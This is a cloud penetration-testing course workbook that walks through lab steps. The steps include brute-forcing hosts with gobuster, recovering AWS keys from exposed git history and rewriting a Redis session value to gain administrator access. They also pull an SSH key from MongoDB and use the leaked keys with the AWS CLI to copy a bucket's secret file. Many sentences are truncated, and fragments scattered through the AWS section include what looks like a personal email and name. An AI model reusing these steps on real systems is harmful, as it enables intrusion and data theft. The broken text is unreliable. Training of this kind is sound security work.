In this lab we did a few things: we used Gobuster to comb through hosts in directory bruteforcing format. We then understood how to loop through a set of hosts passing in directory values. We downloaded exposed .git repositories. From those directories we are able to retrieve sensitive data. This sensitive data we have found appears to be AWS keys that we may be able to use.

If there has been a key exposure issue it is recommended that several steps be taken:

1. Revoke the exposed keys
2. Revoke all other keys
3. Use Multi-Factor authentication with keys when available, like in AWS
4. Consistently rotate your keys

Why This Lab Is Important

This particular lab highlights some important issues with the git utility. The system itself is designed to keep a record of all changes, and as such deleting an incorrectly committed file alone is not good enough to wipe out its contents. Instead you need to completely remove the files using appropriate tools. A tool like BFG Repo-Cleaner (https://rtyley.github.io/bfg-repo-cleaner/) can do this if you follow the process it describes. There are also auditing tools like gitleaks that will help you find issues like these and resolve them.

Experiment with a tool called gitleaks. It can review git repositories for leaks of other types of key material. We will be looking for our key material in a different lab, but if you want a sneak peek, we recommend running this tool.
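As an added illustration of why deleting the file is not enough (this is neither the workbook's code nor gitleaks): a minimal history scanner in Python over constructed `git log -p` output. Both the commit that added the .env file and the later commit that deleted it still carry the key material in their diff lines, which is exactly what an auditing tool like gitleaks reports and what a history rewrite with BFG removes. The commit hashes, file name and key values are placeholders.

```python
"""Scan `git log -p` text for AWS key material. Added example, neither the
workbook's code nor gitleaks; the commit hashes, file name and key values in
the constructed sample are placeholders."""
import re

# Constructed output of `git log -p`: one commit adds a .env file, the next
# deletes it. The key material is still present in both diffs.
SAMPLE_GIT_LOG = """\
commit 0123456789abcdef0123456789abcdef01234567
Author: Dev <dev@example.invalid>

    Opps, committed the key

diff --git a/.env b/.env
--- /dev/null
+++ b/.env
@@ -0,0 +1,3 @@
+DB_HOST=localhost
+AWS_KEY=AKIAEXAMPLEEXAMPLE01
+AWS_SECRET_KEY=ExampleSecretKeyValueExampleSecretKeyVal
commit fedcba9876543210fedcba9876543210fedcba98
Author: Dev <dev@example.invalid>

    remove key file

diff --git a/.env b/.env
--- a/.env
+++ /dev/null
@@ -1,3 +0,0 @@
-DB_HOST=localhost
-AWS_KEY=AKIAEXAMPLEEXAMPLE01
-AWS_SECRET_KEY=ExampleSecretKeyValueExampleSecretKeyVal
"""

PATTERNS = {
    # AWS access key IDs are 20 characters beginning with AKIA.
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    # A 40-character secret assigned to an AWS_SECRET_* variable.
    "aws_secret_key": re.compile(
        r"(?i)aws_secret(?:_access)?_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})"),
}


def scan_git_log(text):
    """Return one finding per matching added or removed diff line."""
    findings, commit = [], None
    for line in text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
            continue
        # Only diff body lines; skip the +++/--- file headers.
        if line[:1] not in ("+", "-") or line.startswith(("+++", "---")):
            continue
        change = "added" if line[0] == "+" else "removed"
        for kind, pattern in PATTERNS.items():
            m = pattern.search(line)
            if m:
                value = m.group(1) if m.lastindex else m.group(0)
                findings.append({"commit": commit, "change": change,
                                 "kind": kind, "value": value})
    return findings


def still_recoverable(findings):
    """Distinct secrets present anywhere in history, deleted later or not."""
    return sorted({(f["kind"], f["value"]) for f in findings})


if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_GIT_LOG):
        print(f"{f['commit'][:8]} {f['change']:7} {f['kind']}")
    print("recoverable:", len(still_recoverable(scan_git_log(SAMPLE_GIT_LOG))))
```

The "removed" findings are the important ones for the remediation steps listed above: a secret that shows up as a removed line is still in the repository's history, so it has to be revoked, not just deleted.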
Exposing databases and session stores to the internet accidentally can happen, specifically when dealing with rapid deployments in highly dynamic environments. Even if the systems in the environment are not directly exposed to the internet, they could also be accessed from within an environment. This lab will introduce the impact of such an issue. We are going to look at the redis database instance that we are running and we are going to look at the mongodb instance that we are also running. In these two environments we will find mechanisms to control websites and potentially to expose potential problems.

Requirements for This Lab

In this lab we will be requiring the SEC588 Virtual Machine to be extracted. It is also going to require internet connectivity.

It is also recommended that Lab 1.2-Lab 1.4 are completed so that you have an understanding of the environment thus far.

http://wiki.<class-subdomain>.sec588.net

Try It Yourself

Given that we have discovered a MongoDB and Redis exposed database, let's attempt to leverage this tool.

3. Log into the redis database environment by using the redis-cli and attempt to modify your role from 'user' to
4. Look at the MongoDB environment. The environment is not only enumerable but it can be changed.
6. Are there any special items located in the MongoDB instance? We will discover these later.

Walkthrough
$ cd /opt/wiki
$ sudo ./wiki-updater.sh

Based on our script we can see that we are getting a permission denied error because we don't have the keys. We will find some keys potentially in the next few slides.

Let's take a look at the dev site: open up Firefox and navigate to http://dev.<class-subdomain>.sec588.net
Once the page opens look at the Session ID area and take a note of it. Also take a note of the fact that you have a user.

It also appears that you have a setting for the type of Beer you have.

Please note that what you see in the screenshot will be different than what is in class; we may have one entry or five entries and the DNS name will be different.
This particular environment has a resolution back to our host. We had previously discovered exposed database ports for our domain. Let's try and take a look at some of these.

The redis server can be logged into via telnet, or alternatively we can use the developer and system administration tools for redis. To do this we would use our redis-cli. We have provided you in the webpage a

Recall that we discovered this particular set of hosts through both host

From the redis-cli type in the command:

<hostname:6379> KEYS *

Your key name will be different.

We can now set a new value. We can play with values like: administrator.

<hostname:6379> SET p8hsnhsaagpmk0iudoi6g7qam administrator
We can see if we are affecting the application by refreshing the page.

Play with these values; while the first value may not have given you different access, maybe another value will:

root
Administrator
superuser
0
admin

Each time you set a new key, refresh the page. Once you are satisfied you can type exit or close the shell.
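Added example, not part of the lab: a Python sketch of the defensive side of what was just demonstrated. The application below keeps the session id to role mapping in a dict that stands in for the Redis instance; a plain value is taken at face value, whereas an HMAC-signed value bound to the session id is rejected as soon as anyone with redis-cli access rewrites it, forges it without the server key, or copies it from another session. The server key and session values are constructed.

```python
"""Integrity-protect session records kept in a store an attacker can write to.
Added example, not the lab's application code. A dict stands in for the Redis
instance; the server key and session values are constructed."""
import hashlib
import hmac

# Kept only in the application's configuration, never in the session store.
SERVER_KEY = b"constructed-server-side-secret-not-in-redis"


def sign_role(role, session_id, key=SERVER_KEY):
    """Store 'role:hexmac' where the MAC binds the role to this session id."""
    mac = hmac.new(key, f"{session_id}:{role}".encode(), hashlib.sha256).hexdigest()
    return f"{role}:{mac}"


def verify_role(stored, session_id, key=SERVER_KEY):
    """Return the role if the MAC verifies, else None (treat as not logged in)."""
    role, sep, mac = stored.rpartition(":")
    if not sep:
        return None  # unsigned value such as a bare 'administrator'
    expected = hmac.new(key, f"{session_id}:{role}".encode(), hashlib.sha256).hexdigest()
    return role if hmac.compare_digest(mac, expected) else None


def demo():
    """Replay the lab's SET against a signed record; returns what the app sees."""
    store = {}  # stands in for Redis: KEYS *, SET <id> <value>
    sid = "p8hsnhsaagpmk0iudoi6g7qam"  # same shape as the lab's key, constructed value
    store[sid] = sign_role("user", sid)
    genuine = verify_role(store[sid], sid)

    store[sid] = "administrator"  # what SET <sid> administrator leaves behind
    overwritten = verify_role(store[sid], sid)

    store[sid] = sign_role("administrator", sid, key=b"wrong-key")  # forged without SERVER_KEY
    forged = verify_role(store[sid], sid)

    store[sid] = sign_role("administrator", "other-session-id")  # copied from another session
    replayed = verify_role(store[sid], sid)
    return genuine, overwritten, forged, replayed


if __name__ == "__main__":
    print(demo())  # ('user', None, None, None)
```

Signing makes a rewritten role detectable, but it does not stop someone with write access from deleting sessions or reading them. The controls that come first are the ones this finding points at: don't expose the port, bind Redis to a private interface, and require authentication (requirepass).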
While redis is designed to hold application state or be a session storage location, MongoDB is more of a Document Object Store that many web applications use as a primary database. Let's attempt to connect to the MongoDB environment since it is not straightforward.

Once you are inside the mongo shell let's look at the databases that are shown:

> show databases

Note admin, config, and local are all standard databases that come with mongo.

Let's look through the mongo database to see what collections (or think tables) are in the demo database:

> db.getCollectionInfos()

The db.getCollectionInfos() call will show you the collections that are inside of the demo database.
> db.beers.find().pretty()

This will show all the items in the beers collection. There seems to be a correlation. What could be in the other collection?

> db.admin.find().pretty()

You can use gedit to do this by typing the following command:

Paste the entire long string in.
Adding our keys into our VM

From the MATE Terminal we now have a set of SSH keys we can add to our Lab VM, but there is an exception. The SSH client doesn't accept a key that doesn't respect the 64 characters per line key size. Luckily we have a simple script that does this. The script is as follows:

#!/bin/bash
rm -Rf /home/sec588/.ssh/sec588-wiki-vm-keys
    -e "s/\S\{64\}/&\n/g"\
chmod 400 /home/sec588/.ssh/sec588-wiki-vm-keys

$ /home/sec588/files/rsajoin/rsajoin.sh

Sometimes you see an issue with the RSAJoin where an extra space (or new line) is added before -----END; we recommend editing the file and removing it.

Once the file is correct you will also need to change the permissions; this will fix the keys but they also need to be committed to the right permissions.

If this works you should be able to update the wiki by typing the following commands:

$ ./wiki-updater.sh
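Added example, not the workbook's rsajoin.sh: the same 64-character re-wrap done in Python, which also strips the stray space or newline before -----END that the text above warns about, and a check you can run on the result before chmod 400. The key body is a constructed placeholder, not real key material.

```python
"""Re-wrap a single-line PEM key into 64-character lines. Added example, not
the workbook's rsajoin.sh; the key body below is a constructed placeholder."""
import re

_PEM = re.compile(r"(-----BEGIN [A-Z ]+-----)(.*?)(-----END [A-Z ]+-----)", re.S)


def rewrap_pem(text, width=64):
    """Return header, body re-wrapped at `width`, footer and a trailing newline.
    Whitespace inside the body, including a stray space or newline before the
    -----END marker, is discarded before wrapping."""
    m = _PEM.search(text)
    if not m:
        raise ValueError("no PEM block found")
    header, body, footer = m.groups()
    body = re.sub(r"\s+", "", body)
    lines = [body[i:i + width] for i in range(0, len(body), width)]
    return "\n".join([header, *lines, footer]) + "\n"


def check_pem(text, width=64):
    """True if the block has a body whose lines are `width` long (last may be shorter)."""
    lines = text.strip().splitlines()
    body = lines[1:-1]
    if not body or not lines[0].startswith("-----BEGIN") or not lines[-1].startswith("-----END"):
        return False
    return all(len(l) == width for l in body[:-1]) and 0 < len(body[-1]) <= width


# Constructed one-line key as pasted from the MongoDB document, with the
# stray space-and-newline before -----END that the text above warns about.
SAMPLE_ONE_LINE = ("-----BEGIN OPENSSH PRIVATE KEY-----"
                   + "A" * 64 + "B" * 64 + "C" * 22 + " \n"
                   + "-----END OPENSSH PRIVATE KEY-----")

if __name__ == "__main__":
    print(rewrap_pem(SAMPLE_ONE_LINE))
```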
Replay of this lab

Conclusion

In this lab we have discovered an SSH key buried within an admin key in the MongoDB environment. While this is not necessarily always the case, the primary objective of the lab was to demonstrate the dangers of exposing a database to the open internet; alternatively, if an attacker has shell access to a server they can discover a database that exists already and manipulate an application at runtime.

We will be exploring these concepts more in a future lab.

Why This Lab Is Important

Misconfigurations such as exposing databases into the public cloud can happen quite easily in a rapidly moving cloud system. It is important to understand what the impacts are to such a system.
Brief Intro

Our eyes have the capacity to pick out information visually, at times much quicker than we would normally given text. It takes us longer to read through words, and our minds tend to self-correct or focus on the wrong things. EyeWitness provides us the capability to take screenshots of HTTP pages and then allows us to view them in a single report-style page, which could yield us efficiencies through saving us valuable time. We can also glean valuable information; maybe a website has lots of JavaScript and isn't named in a way that we are able to understand its own functionality. This tool can give us this capability.

Requirements for This Lab

By now you should have found the Wiki and even downloaded it locally to your computer.

http://wiki.<class-subdomain>.sec588.net

Try It Yourself

In this particular lab we are going to be taking the sites that we have found and start to catalog them into a

To do this you will want to create an A/B comparison. To create an A/B comparison we recommend for you to

$ gedit /home/sec588/files/workdir/ips.txt
$ gedit /home/sec588/files/workdir/urls.txt
Walkthrough

Open a MATE shell and let's re-run dnsrecon.py.

We are going to follow the process we have been following to obtain IP addresses and host names to scan.

$ cd /opt/dnsrecon
$ ./dnsrecon.py --iw -d <class-subdomain>.sec588.net -D /home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt -c /home/sec588/files/workdir/dnsrecon.csv
2. Use awk to just pull out the correct sections that are in the csv.

This is the awk command below; you can choose either method you are comfortable with:

$ awk -F, '{ print tolower($2) }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt

The reason the command has multiple pipe operators is to remove the duplicate entries, and remove junk like the CSV header of Name and the Amazon AWS CNAMEs. Because tolower() has already run, the header is filtered as lowercase name. Once this is done you can now copy this list into a file for use with EyeWitness. This is what the > does.

Now we can attempt to do the same with Masscan. We have all of the hostnames, but we also have all the IPs that are associated with this particular domain. Let's obtain those IP addresses.

$ awk -F, '{ print $3 }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v Address | grep -v '^$' > /home/sec588/files/workdir/ips.txt
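Added example, not the workbook's code: a Python equivalent of the two awk pipelines above (and of the urls.txt pipeline in the earlier .git lab), run against a constructed dnsrecon.csv, which produces the same URL and IP lists. It keeps the same edge cases the pipelines handle: a duplicate name differing only in case, the CNAME row with an empty address, the amazonaws target, and the CSV header. The domain and addresses are placeholders.

```python
"""Split a dnsrecon CSV into hostname and IP lists. Added example, not the
workbook's code: a Python equivalent of the awk | sort -u | grep -v pipelines,
run against a constructed dnsrecon.csv (the domain and addresses are placeholders)."""
import csv
import io

# Constructed dnsrecon output. Column 2 is Name, column 3 is Address, exactly
# what $2 and $3 refer to in the awk commands. Note the duplicate name that
# differs only in case, the CNAME with no address, and the amazonaws target.
SAMPLE_DNSRECON_CSV = """\
Type,Name,Address,Target,Port,String
A,Dev.lab.sec588.net,192.0.2.20,,,
A,wiki.lab.sec588.net,192.0.2.21,,,
CNAME,pictures.lab.sec588.net,,s3-website-us-east-1.amazonaws.com,,
A,ec2-192-0-2-22.compute-1.amazonaws.com,192.0.2.22,,,
A,dev.lab.sec588.net,192.0.2.20,,,
"""


def _rows(csv_text):
    return list(csv.reader(io.StringIO(csv_text)))


def extract_urls(csv_text):
    """awk -F, '{ print tolower($2) }' | sort -u | grep -v name | grep -v amazonaws"""
    names = {row[1].lower() for row in _rows(csv_text) if len(row) > 1}
    # The header is already 'name' here because tolower() ran first; a
    # case-sensitive filter on 'Name' would leave it in the list. Like grep -v,
    # this also drops any real hostname that happens to contain 'name'.
    return sorted(n for n in names if "name" not in n and "amazonaws" not in n)


def extract_ips(csv_text):
    """awk -F, '{ print $3 }' | sort -u | grep -v Address | grep -v '^$'"""
    addrs = {row[2] for row in _rows(csv_text) if len(row) > 2}
    return sorted(a for a in addrs if a and a != "Address")


if __name__ == "__main__":
    print("\n".join(extract_urls(SAMPLE_DNSRECON_CSV)))
    print("\n".join(extract_ips(SAMPLE_DNSRECON_CSV)))
```

The IP list keeps 192.0.2.22 even though its name is an amazonaws hostname: the name filter only applies to urls.txt, which is why the two EyeWitness runs below differ.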
We now have two lists, one for URLs and one for IP addresses. We can make this one list but let's see what will

Let's first get into our EyeWitness directory, now that we have the prerequisite files. Let's run the first collection of IPs.

$ cd /opt/eyewitness

When this is complete it will ask you if you wish to view the report now; enter a "Y" and hit Enter. This will load
We can see that some pages are indeed available in the system using this method, but this is all subject to implementation, as most systems use the Host: header in HTTP to direct them to their appropriate site. This is what occurs with Amazon S3, and we do not see our websites with the Amazon S3 addresses; instead we see the default Amazon page. Let's try and correct this.

The difference between both reports will be somewhat evident in that now we are no longer seeing any pages that are from the hosting provider. We can understand that it's hosted on AWS IP space in many ways, and one of the more simple ones is to just try the page by IP address. This is just a simple visual indicator that will be potentially lost using the URLs. There are other markers which we will discuss later, like the AMZN header.
$ cat categories.txt

What it's doing is gathering a string of text and placing it in a category by appending a pipe operator '|' and then the category afterwards. As these sites do not match any text they will not be categorized.

As always, if you feel that you can contribute to a tool and provide a set of categories back to the author they may accept a pull request like this.

Replay of this lab

Conclusion

In this lab we have:

1. Surface reviewed the contents of our exposed systems
2. Viewed the A/B comparison between these hostnames and IP scanning of these systems

We can now continue to review this environment and assess it for any weakness that we may encounter.

This lab is important because reconnaissance, asset discovery, and surface area enumeration are critical components when it comes to the beginning of understanding how to assess an environment or how to properly defend it. We feel that using tools like this provides a great advantage to both red and blue teams.
Brief Intro

This lab walks you through using Postman and cURL. The lab serves as both a tour of Postman as well as getting familiar with cURL. These tools will serve you well as both attackers and defenders as they can provide you with an interface into an API system.

Requirements for This Lab

This lab does not require that Section 1 be done; however, it would be beneficial to have those URLs available. It will also require two command line tools:

Try It Yourself

This lab will demonstrate how to use Postman and the cURL tool for testing both APIs and web applications.

2. Attempt a request with the /patch method in cURL and execute a request with a header of application/json
8. Once this is validated, get the cURL equivalent command and attempt it.

Walkthrough
$ cd /opt/postman
$ ./Postman

There is an icon on the desktop as well; either one will take a few minutes to open.

Once Postman is open you will be presented with the Postman UI.
The UI screen can be maximized to be able to use our screen real estate. Let's now create a new request. Do not click on the New button; instead click on the + to open a new tab next to the Launchbar.

Now we will focus on creating a request that we can work with. To get familiar with the tool let's visit httpbin.org

http://httpbin.org/

This website is a page with functionality to help you understand how APIs tend to work. The website is for you to learn with, and so there are many options to play with. The entire website is developed with the Swagger API, which is a popular API standard with their own API schema that they published.
Click the HTTP Methods button on the page to open the Swagger API calls that are supported.

We see that a large number of methods are supported with this set of calls; each one of these methods (DELETE, GET, PATCH, POST for this example) is hosted in the path with the same name. So you can call DELETE on the /DELETE route, you can call GET on the /GET route, and so on.

Let us now configure Postman to play with some of these; let's open PATCH.

First click on the PATCH area to open the Swagger capability to perform the action for yourself.
Now some of the items that we will want to focus in on is the fact that this request, when executed, will be with the application/json request type, not the typical text/html request. By clicking the word Execute it will execute the command in the browser.

The Execute command will only show up after you click 'Try it out'.

Look at the output; we see a few items. First the cURL equivalent to execute the command, secondly we see the
If you wish to make a note of the cURL command you can; this guide will replicate the command for you. It is:

Open Postman and in the request window, in the method area, switch the method from GET to PATCH; in the URL put http://httpbin.org/patch. Hit the Send button to get a response.
We can inspect the response in the response body. You can see the origin and some of the other output in its format. Let's now play around with environments. In the upper right hand corner click the eyeball.

Click the add button; if you have an existing environment the button will say edit. Name the

Under variable put in the word method; for the initial value enter patch, and in the current value enter patch.
Click update and then hit add and do this all over again. There is a bug in this version of the User Interface.

Once you see it in the list of environments, hit the X in the corner of this area to close it.

Select the drop down in the environment to choose Lab 2.1 Temporary as the environment.

In the URL of the request remove the word patch and replace it with {{method}} as is shown in the screenshot below.

We have now created a variable that we can change over time. Let's now make this API do some additional things. One of the common items we may have to deal with is Authorization. The httpbin.org website does allow us to attempt a basic authentication. Let's set up basic authentication with Postman.

Let's first set up our environment for reusability. Click back into the environment window using the eyeball, and click 'edit'. Change the method's current value from patch to get. Set a new value
username    sec588

http://httpbin.org/basic-auth/{{username}}/{{password}}

Next, in the method, change it to a GET request. Finally change the Authorization to Basic Auth. Set the username to {{username}} and the password to {{password}}.
This will present you with a menu that has the dropdown for different languages. Find the 'curl' one as shown below.

Copy the curl command; once it is copied, open a MATE terminal and paste the curl command in.
Replay of this lab

Why This Lab Is Important

We will be using Postman to simulate requests to APIs throughout our labs; learning how Postman works will be a critical utility to be able to build and automate attacks. Sometimes developer tools tend to be very powerful attack tools; we need to embrace these tools as they may be available ahead of our attack tool wrappers.

Additional Resources
Brief Intro

We are currently in our Mapping section where we are looking at how to be more efficient when we map out networks, applications, and services.

Throughout this course you will be interacting with many of the Amazon Web Services APIs. The simplest way to facilitate access to the AWS API, outside of a tool that may constrain some of the API while automating other parts, is to be familiar with the API itself. The easiest way to become intimately familiar is with the use of the Amazon AWS CLI tool. In this lab we will start to work with the tool, including configuring a key by hand, working with filters and queries, and iterating through sets of data.

We discovered an AWS key string potentially in our Day 1 Lab 4 exercise. Let's see if we can actually attempt to use those particular keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can

This lab would require you to have completed all of the Day 1 exercises; however, we will be reviewing many of the topics in the prerequisite sections. This lab does require connectivity to our AWS environment.

It will also require that we have our AWS tools installed in our VM. You can check this by typing the following command in the CLI and looking for the aws help message:

$ aws

Try It Yourself

In the previous day in Lab 1.4 we found what appeared to be Amazon Web Services API keys. In this lab we will be looking at the API keys.

1. Configure a profile using the keys with the name lab22
2. List out all of the contents within the s3 bucket of pictures.<class-subdomain>.sec588.net
3. Try and see if you have permissions to read all s3 buckets
Walkthrough

Configuration of AWS Profiles

Let's open a MATE terminal to configure the appropriate profile in AWS:

Let's fill in the information with what we have had presented to us. In Lab 1.4 we found API keys in a git commit of a .env file. Let's open those up and answer the questions in configure:
We have provided an example screenshot below:

Let's test to see what permissions we have. First you can see what the tool supports by using the help commands:

$ aws help
$ aws s3 help

We have provided you some commands to try. Now, we understand that we haven't provided you with a ton of context on the tool, and that will be coming here in a minute, but let's play with the AWS CLI to understand the options.

$ aws s3 ls

But why? We need to pass it the appropriate profile to use, and to ensure we highlight this critical feature we wanted to display what happens without the profile option.
$ aws s3 ls s3://pictures.<class-subdomain>.sec588.net --profile lab22

We are going to provide you an S3 URL that you can use to explore; specifically we will provide you with the images s3 bucket. You can also copy anything you wish out of this s3 bucket; it can be any file in here. Specifically, let's take our raven picture and the secretdata.txt file.

$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/raven.png /home/sec588/files/workdir/raven.png
$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/secretdata.txt /home/sec588/files/workdir/secretdata.txt

The specific IAM access control entry we have is for s3:Get*, which would allow us to get buckets. We may also be able to perform specific s3 operations if the s3 bucket policy is not restrictive. Now let's try and list all buckets.

$ aws s3 ls --profile lab22

This yields us a permission denied error; let's see what else we may be able to do. To see what user this
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
You can see the use will be the bob- user. We will try one more thing let's place with enumerating all the public IP
ok
23169600
addresses like we described in an earlier slide:
@
ou
tlo
The commands after jq are case sensitive ensure you have the proper casing!
66
.PublicIpAddress'
ne
ljo
Gregg Harris
While the command above provides the details of the IP addresses, we need to do some work to get the security group tied to those addresses. Let's play around with some of the commands to see what exactly happens when

The first step is to play with the string interpolation feature of jq to be able to pull out the instance ID and the IP address; these are both contained in the same place:

\(.PublicIpAddress)"'
for SG in `aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] | .NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; done

This command prints the group IDs out; let's append the describe-security-groups call to the end of the loop body:

for SG in `aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[] | .NetworkInterfaces[] | .Groups[] | .GroupId' | tr -d '"'`; do echo $SG; aws ec2 describe-security-groups --profile lab22 --group-ids $SG | jq '.SecurityGroups[] | .IpPermissions[] | .ToPort'; echo "===="; done
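As an added example that is not part of the workbook, here is the same traversal the two jq pipelines above perform, written in Python so it runs offline against constructed describe-instances and describe-security-groups output (the instance IDs, IPs, group IDs and the 111111111111 account number are made up). Beyond what the loop prints, it joins the two views and reports which public instances sit behind a group with an ingress rule open to 0.0.0.0/0 or ::/0, which is the check a reviewer actually wants from this data.

```python
import json

# Constructed sample of `aws ec2 describe-instances` output (not real lab data):
# two instances, one with a public IP and two security groups.
DESCRIBE_INSTANCES = json.loads("""
{"Reservations": [
  {"Instances": [
    {"InstanceId": "i-0aaa111", "PublicIpAddress": "203.0.113.10",
     "IamInstanceProfile": {"Arn": "arn:aws:iam::111111111111:instance-profile/ec2-kms-example"},
     "NetworkInterfaces": [{"Groups": [{"GroupId": "sg-0001"}, {"GroupId": "sg-0002"}]}]},
    {"InstanceId": "i-0bbb222",
     "NetworkInterfaces": [{"Groups": [{"GroupId": "sg-0002"}]}]}
  ]}
]}
""")

# Constructed sample of `aws ec2 describe-security-groups --group-ids sg-0001 sg-0002`.
DESCRIBE_SGS = json.loads("""
{"SecurityGroups": [
  {"GroupId": "sg-0001", "IpPermissions": [
     {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
      "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []},
     {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
      "IpRanges": [{"CidrIp": "10.10.0.0/16"}], "Ipv6Ranges": []}]},
  {"GroupId": "sg-0002", "IpPermissions": [
     {"IpProtocol": "-1",
      "IpRanges": [], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]}
]}
""")

WORLD = {"0.0.0.0/0", "::/0"}


def instances(describe_instances):
    """Flatten describe-instances the way the jq pipeline does
    (.Reservations[] | .Instances[]): one dict per instance with its id,
    public IP (None if absent), instance profile ARN and security group ids."""
    out = []
    for res in describe_instances["Reservations"]:
        for inst in res["Instances"]:
            groups = [g["GroupId"]
                      for eni in inst.get("NetworkInterfaces", [])
                      for g in eni.get("Groups", [])]
            out.append({
                "InstanceId": inst["InstanceId"],
                "PublicIpAddress": inst.get("PublicIpAddress"),
                "InstanceProfileArn": inst.get("IamInstanceProfile", {}).get("Arn"),
                "GroupIds": sorted(set(groups)),
            })
    return out


def world_open_rules(describe_sgs):
    """Return (GroupId, protocol, FromPort, ToPort, cidr) for every ingress rule
    whose source is 0.0.0.0/0 or ::/0. IpProtocol "-1" means all traffic; the
    CLI omits FromPort/ToPort for it, so they are reported as None."""
    findings = []
    for sg in describe_sgs["SecurityGroups"]:
        for perm in sg.get("IpPermissions", []):
            cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            for cidr in cidrs:
                if cidr in WORLD:
                    findings.append((sg["GroupId"], perm["IpProtocol"],
                                     perm.get("FromPort"), perm.get("ToPort"), cidr))
    return findings


def exposed_instances(describe_instances, describe_sgs):
    """Join the two views: instances with a public IP whose groups carry a
    world-open rule. The lab's for/jq loop prints the pieces; this does the join."""
    open_groups = {f[0] for f in world_open_rules(describe_sgs)}
    return [(i["InstanceId"], i["PublicIpAddress"], sorted(open_groups & set(i["GroupIds"])))
            for i in instances(describe_instances)
            if i["PublicIpAddress"] and open_groups & set(i["GroupIds"])]


if __name__ == "__main__":
    for inst in instances(DESCRIBE_INSTANCES):
        print(f'{inst["InstanceId"]} || {inst["PublicIpAddress"]} || {inst["InstanceProfileArn"]}')
    for f in world_open_rules(DESCRIBE_SGS):
        print("world-open:", f)
    print("exposed:", exposed_instances(DESCRIBE_INSTANCES, DESCRIBE_SGS))
```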
Now that we understand what we can do with the AWS CLI, let's use the CLI toolkit's power to start exploring the infrastructure permissions of the system. AWS has a very powerful permissions model, but with its age it has
Brief Intro
This lab introduces you to the usefulness of extremely large and relevant wordlists.
The wordlists used in this lab have been created using a specific set of queries against publicly available datasets at Google.

The author of this course has decided not to have the students RUN the commands; instead, he has just shown you the commands below which had been used to create the wordlists in this class. If you wish to do this after class, you can, and you will need:

2. About $20 - $25 to run the queries in the Big Table database
rails-routes.txt
~/.config/gcloud/application_default_credentials.json subdomains
/home/sec588/files/wordlists
What does the first command do? It leverages a public set of data sets

During this lab you will find and uncover new applications, hosts and resources that will be used throughout the labs today. Similar to the first day, this will be a cloud-based treasure hunt. Your goal will be to find the applications that allow us to:
1. Post text
2. Post a comment to that text
3. Any additional resources that are related
$ head -10000 subdomains.txt > subdomains-10k.txt

We will only be using the -5k.txt and -10k based wordlists.
Requirements for This Lab
In this lab we will be requiring connectivity to our lab environment.
Try It Yourself
To attempt this lab yourself you will need a few bits of information:
1. Find the blog site using /opt/gobuster
2. The gobuster command for finding the hosts will be dns; the wordlist for this is going to be the wordlist in files/wordlists
3. Find the hidden API URLs in the blog site using /opt/gobuster; you will need to use the dir option.
4. The wordlist for this is rails-routes-5k.txt in the directory files/wordlists
5. The command line options that are needed are to set the threads at 100 and run the system in quiet mode
6. Once you have located the blog, attempt to delete a post; you will not be able to. Try and delete it by using
Walkthrough
Getting started
We are going to be using gobuster to work through our wordlist in a very quick and efficient way.

Commonspeak2 wordlists can be in the 1M+ range, but working through a 1M+ wordlist would be a very

We will start by opening a MATE terminal if one is not already opened:
cd /home/sec588/files/wordlists
If we list out the directory (ls) we should see several files with their corresponding 'commonspeak2' category: rails-routes, subdomains, and scm
What we see when we cat this out is a list, but a list of what? This happens to be a list of all of the 'common' subdomains that have been found, ordered by likelihood, inside of specific repositories like hackernews and

These subdomains are the basis of the entire set of potential hosts. What gobuster can do is start with a base domain like:

sec588.net
www.sec588.net
blog.sec588.net

and go through the wordlist looking for 'valid' 200 OK messages. Gobuster is a rather 'dumb' tool, however: it will just look for valid 200 OK messages; it can follow redirects, but it will also detect '404's as valid at times.
This particular wordlist has a different feel. All of the words on here look like the ends of URIs. The reason for this is that this particular wordlist comes from GitHub entries. They are actually based on repositories for the Ruby on Rails set of applications in which the Rails routes file, routes.rb, is looked at. The particular interest in this file is URIs that have been removed from routes.rb, which could be done for many valid reasons. The hope was to:

2. Get a list of URIs that may have security issues that a developer may have needed to remove from public exposure.

Now that we have a baseline for a set of wordlists, let's play with them to discover good and known pages.
Gobuster has a set of tools to discover three individual items.

Let's look at some of the options for gobuster by going into the gobuster subdirectory and running the executable:

$ cd /opt/gobuster
Let's explore a few of these; first we will be working with the gobuster dns options to find new hosts for us to attack:
We will be using a few command line switches to start:
-d : this will specify our domain name. For this lab it will be: <class-subdomain>.sec588.net
-w : this will specify our wordlist. For this lab it will be: /home/sec588/files/wordlists/subdomains-10k.txt
We have found a few hosts that could be interesting:
www
blog
dev
wiki
railsapi
Let's explore some of these in more detail. Do any of them have interesting directories?

Gobuster has a directory brute forcing capability that is rather primitive but effective. Let's start with appending a Rails route to the end of some of the hosts. We will start with blog as it is the first entry in our list:

$ cd /opt/gobuster
$ ./gobuster help dir
-u : This will be our URL string, so for blog.<class-subdomain>.sec588.net this will be our URL for our lab.
-a : This is the user-agent string that is sent; our Slingshot build for SEC588 has a very specific User-Agent string in the environment variables. To see it type env | grep UA and you will see that the $UA variable is set to Chrome 74.
-t : This is to set the number of threads; we will use 100.
-q : There will be many errors; this suppresses those errors.

Our command:

$ /opt/gobuster/gobuster dir -u blog.<class-subdomain>.sec588.net -w /home/sec588/files/wordlists/rails-routes-5k.txt -a $UA -q -t 100
